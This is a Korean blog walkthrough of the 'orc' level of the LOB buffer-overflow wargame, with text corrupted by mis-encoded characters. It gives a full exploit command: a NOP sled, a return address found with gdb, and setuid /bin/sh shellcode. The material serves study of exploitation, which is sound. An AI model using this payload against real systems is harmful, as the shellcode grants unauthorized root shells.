๐’ƒ๐’†๐’‚๐’–๐’•๐’š ๐’Š๐’๐’•๐’†๐’๐’๐’Š๐’ˆ๐’†๐’๐’•

Wargame/CTF(Capture The Flag)

LOB orc

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 9. 15.
728x90
๋ฐ˜์‘ํ˜•


cp๋ช…๋ น์–ด ๊ฐ™์€ ๊ฑด ๋ฌด์‹œํ•˜๊ณ  ๋‹ค์‹œ ์ ‘์†์„ ํ•˜์—ฌ ๋ฌธ์ œ๋ฅผ ํ’€๋ฉด 

orc.c๋ฅผ ์—ด์–ด๋ณด๋ฉด buffer๊ฐ€ 40์ด๊ณ  ๋ฆฌํ„ด๊ฐ’์ด \xbf๊ฐ€ ๊ผญ ๋“ค์–ด๊ฐ€์•ผ ํ•œ๋‹ค๊ณ  ๋‚˜์˜จ๋‹ค.


gdb๋ฅผ ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ๋ฉ”์ธ์— ๋ธŒ๋ ˆ์ดํฌํฌ์ธํŠธ๋ฅผ ๊ฑธ๊ณ  r $(python -c 'print "\x90"*100์„ ์ž…๋ ฅํ•˜์—ฌ esp๊ฐ’์„ ๋ฐ”๊พธ์—ˆ๋‹ค.

๊ทธํ›„ x/100 $esp๋กœ ๊ฐ’์„ ํ™•์ธํ•˜๋ฉด 90909090๋“ค์–ด๊ฐ€ ์žˆ๋Š” ์ฃผ์†Œ๋ฅผ ๋ณผ์ˆ˜ ์žˆ๋‹ค.




payload๋ฅผ ์ž‘์„ฑํ•ด๋ณด๋ฉด  ./orc $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xdb\xfb\xff\xbf(ret ์ฃผ์†Œ๊ฐ’)"+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')




728x90
๋ฐ˜์‘ํ˜•
์ €์ž‘์žํ‘œ์‹œ

'Wargame > CTF(Capture The Flag)' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

LOB darklf  (0) 2015.09.15
LOB wolfman  (0) 2015.09.15
LOB goblin  (0) 2015.09.15
LOB gremlin  (0) 2015.09.14
LOB gate  (0) 2015.09.14

๋Œ“๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”